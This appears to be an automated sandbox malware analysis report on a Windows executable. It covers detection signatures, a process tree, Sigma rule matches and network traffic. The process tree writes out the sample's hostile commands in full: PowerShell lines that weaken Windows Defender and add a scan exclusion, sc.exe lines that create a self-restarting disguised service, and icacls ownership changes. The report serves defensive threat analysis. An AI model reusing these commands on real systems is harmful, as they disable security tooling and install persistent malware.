Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1516963
MD5:	54a1448df6e33d7032232dd1d896bc68
SHA1:	8ed1df1c308956143e79adf5732e2d6204faf58a
SHA256:	075d0dafd7b794fbabaf53d38895cfd7cffed4a3fe093b0fc7853f3b3ce642a4
Tags:	exeuser-Bitsight
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Connects to many ports of the same IP (likely port scanning)

Contains functionality to hide user accounts

Found Tor onion address

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

NDIS Filter Driver detected (likely used to intercept and sniff network traffic)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious New Service Creation

Sigma detected: Suspicious Program Location with Network Connections

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Binary contains a suspicious time stamp

Connects to several IPs in different countries

Contains functionality to call native functions

Contains functionality to create new users

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query network adapater information

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Classification

Process Tree

System is w10x64

file.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 54A1448DF6E33D7032232DD1D896BC68)

file.exe (PID: 6728 cmdline: C:\Users\user\Desktop\file.exe MD5: 54A1448DF6E33D7032232DD1D896BC68)

cmd.exe (PID: 6928 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7120 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 2308 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 2132 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

3lp16vmh8u8y3z1y6.exe (PID: 5432 cmdline: "C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe" MD5: 319865D78CC8DF6270E27521B8182BFF)

dx4w727xyq6q2yaxja.exe (PID: 3744 cmdline: "C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe" MD5: 7D1755E8E41A6C2F08D2FAEFFDF9DAD1)

taskkill.exe (PID: 5104 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2520 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5024 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5936 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5828 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icacls.exe (PID: 2488 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)

conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icacls.exe (PID: 5356 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)

conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

main.exe (PID: 7108 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)

cleanup

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 7108, ProcessName: main.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7120, ProcessName: powershell.exe

Sigma detected: Suspicious New Service Creation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe, ParentProcessId: 3744, ParentProcessName: dx4w727xyq6q2yaxja.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 5024, ProcessName: sc.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 85.239.52.241, DestinationIsIpv6: false, DestinationPort: 28764, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 7108, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49745

Sigma detected: Powershell Defender Exclusion

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 2132, ProcessName: powershell.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe, ParentProcessId: 3744, ParentProcessName: dx4w727xyq6q2yaxja.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 5024, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7120, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source:	Binary string: RfxVmt.pdb source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.1974223599.000001FC7A526000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.23.dr, HwfABz7s.23.dr
Source:	Binary string: RfxVmt.pdbGCTL source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.1974223599.000001FC7A526000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.23.dr, HwfABz7s.23.dr

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E136D5F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,		23_2_00007FFE0E136D5F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E136DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,		23_2_00007FFE0E136DA3

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe	Code function: 5_2_00007FF73AFB3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	5_2_00007FF73AFB3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF6EF6547A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FF6EF6547A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E13A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE0E13A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E161883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE0E161883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0EB45BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE0EB45BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11EC5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE11EC5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126D2FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE126D2FE3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE133857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE133857B3

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 70.113.162.253 ports 1,2,4,14928,8,9
Source: global traffic	TCP traffic: 85.239.52.241 ports 2,4,28764,6,7,8
Source: global traffic	TCP traffic: 88.210.6.42 ports 25314,1,2,3,4,5
Source: global traffic	TCP traffic: 141.98.234.85 ports 42069,0,2,4,6,9

Found Tor onion address

Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: zCUeqzwC.23.dr	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/

NDIS Filter Driver detected (likely used to intercept and sniff network traffic)

Source: 3lp16vmh8u8y3z1y6.exe.1.dr

Static PE information: Found NDIS imports: FwpmEngineClose0, FwpmEngineOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0

Source: unknown

Network traffic detected: IP country count 21

Source: global traffic	TCP traffic: 192.168.2.4:49730 -> 64.95.13.143:1120
Source: global traffic	TCP traffic: 192.168.2.4:49745 -> 85.239.52.241:28764
Source: global traffic	TCP traffic: 192.168.2.4:49746 -> 101.191.73.121:18088
Source: global traffic	TCP traffic: 192.168.2.4:49747 -> 85.230.189.73:29072
Source: global traffic	TCP traffic: 192.168.2.4:49748 -> 70.113.162.253:14928
Source: global traffic	TCP traffic: 192.168.2.4:49749 -> 194.207.132.221:17106
Source: global traffic	TCP traffic: 192.168.2.4:49750 -> 24.70.217.209:15318
Source: global traffic	TCP traffic: 192.168.2.4:49751 -> 74.222.100.29:9686
Source: global traffic	TCP traffic: 192.168.2.4:49752 -> 89.89.209.95:62129
Source: global traffic	TCP traffic: 192.168.2.4:49753 -> 188.174.130.9:11724
Source: global traffic	TCP traffic: 192.168.2.4:49754 -> 141.98.234.85:42069
Source: global traffic	TCP traffic: 192.168.2.4:49758 -> 184.65.173.183:11171
Source: global traffic	TCP traffic: 192.168.2.4:49759 -> 88.210.6.42:25314
Source: global traffic	TCP traffic: 192.168.2.4:49760 -> 207.178.119.175:29260
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 213.145.125.139:21689
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 188.89.23.222:19229
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 66.228.49.30:23016
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 185.128.245.162:25107
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 24.231.176.11:22951
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 107.189.6.31:23012
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 2.177.52.177:14810
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 45.76.244.95:22681
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 161.65.240.191:18793
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 47.250.187.161:27292
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 99.234.18.44:23154
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 212.118.52.164:26199
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 5.104.75.170:12345
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 81.183.201.129:9732
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 2.135.133.55:12868
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 198.37.222.72:25083
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 85.239.63.250:26748
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 92.95.33.134:38552
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 31.13.134.204:25275
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 78.47.80.55:12207
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 135.181.40.188:13568
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 99.252.228.84:23131
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 5.19.249.240:19209
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 85.239.53.47:28583
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 24.51.216.45:27375
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 139.162.110.14:22293
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 66.78.40.49:20105
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 217.10.112.72:10706
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 86.106.93.104:14840
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 106.68.22.241:26891
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 108.227.133.164:21344
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 190.22.24.78:33037
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 176.109.240.152:23773
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 68.1.55.11:26636
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 89.219.212.160:15363
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 86.46.70.248:15622
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 188.187.151.89:26647
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 68.65.178.44:23154
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 46.51.90.183:12340
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 85.6.171.9:19675
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 88.156.92.211:37691
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 73.246.172.43:21102
Source: global traffic	UDP traffic: 192.168.2.4:17383 -> 154.61.58.162:23154

Source: Joe Sandbox View

ASN Name: TWC-11427-TEXASUS TWC-11427-TEXASUS

Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 64.95.13.143

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FFE0E135EEA recv,WSAGetLastError,

23_2_00007FFE0E135EEA

Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	String found in binary or memory: http://127.0.0.1:8118
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	String found in binary or memory: http://identiguy.i2p/hosts.txt
